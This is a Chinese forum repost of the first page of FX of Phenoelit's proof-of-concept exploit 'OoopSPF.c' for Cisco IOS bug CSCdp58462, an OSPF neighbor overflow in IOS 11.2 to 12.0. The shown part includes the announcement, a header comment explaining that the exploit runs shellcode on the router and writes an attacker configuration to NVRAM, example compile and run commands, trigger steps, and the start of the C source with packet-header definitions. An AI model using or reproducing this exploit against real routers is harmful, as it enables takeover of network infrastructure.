dfdggg44 发表于 2011-3-28 07:55:04

Cisco IOS OSPF exploit

  Hi there,   attached you may find the exploit for the Cisco IOS bug ID CSCdp58462. The bug   is long fixed, so if you still run OSPF on a old version of IOS, now is a good   time to give your routers some attention.     FX     --   FX   Phenoelit http://www.phenoelit.de)   672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564     ["OoopSPF.c" (text/plain)]     /* Cisco IOS IO memory exploit prove of concept   * by FX of Phenoelit   *http://www.phenoelit.de   *   * For:   * 19C3 Chaos Communication Congress 2002 / Berlin   * BlackHat Briefings Seattle 2003   *   * Cisco IOS 11.2.x to 12.0.x OSPF neighbor overflow   * Cisco Bug CSCdp58462 causes more than 255 OSPF neighbors to overflow a IO memory   * structure (small buffer header). The attached program is a PoC to exploit   * this vulnerability by executing "shell code" on the router and write the   * attached configuration into NVRAM to basicaly own the router.   *   * Example:   * linux# gcc -o OoopSPF OoopSPF.c   * linux# ./OoopSPF -s 172.16.0.0 -n 255.255.0.0 -d 172.16.1.4 /   * -f ./small.config -t 0 -a 1.2.3.4 -vv   *   * You can see if it worked if a) the router does not crash and b) the output of   * "show mem io" looks like this:   * E40E38 264 E40D04 E40F6C 1 31632D8 *Packet Data*   * E40F6C 264 E40E38 E410A0 1 31632D8 *Packet Data*   * E410A0 264 E40F6C E411D4 1 31632D8 *Packet Data*   * E411D4 1830400 E410A0 0 0 0 E411F8 808A8B8C   *   * Exploit has to be "triggered". In LAB environment, go to the router and say   * box# conf t   * box(config)# buffers small perm 0   *   * Greets go to the Phenoelit members, the usual suspects Halvar, Johnny Cyberpunk,   * Svoern, Scusi, Pandzilla, and Dizzy, to the #phenoelit people,   * Gaus of PSIRT, Nico of Securite.org and Dan Kaminsky.   *   * $Id: OoopSPF.c,v 1.4 2003/02/20 16:38:30 root Exp root $   */     #include   #include   #include   #include   #include   #include   #include   #include   #include   #include     #include   #include   #include   #include     #define IPTTL 0x80   #define BLABLA "Phenoelit OoopSPF/n" /   " Cisco IOS OSPF remote exploit (11.2.-12.0)/n" /   " (C) 2002/2003 - FX of Phenoelit /n"   #define IPPROTO_OSPF 0x59   #define IP_ADDR_LEN 4   typedef struct {   u_int8_t ihl:4, /* header length */   version:4; /* version */   u_int8_t tos; /* type of service */   u_int16_t tot_len; /* total length */   u_int16_t id; /* identification */            1/9 123456下一页尾页
页: [1]
查看完整版本: Cisco IOS OSPF exploit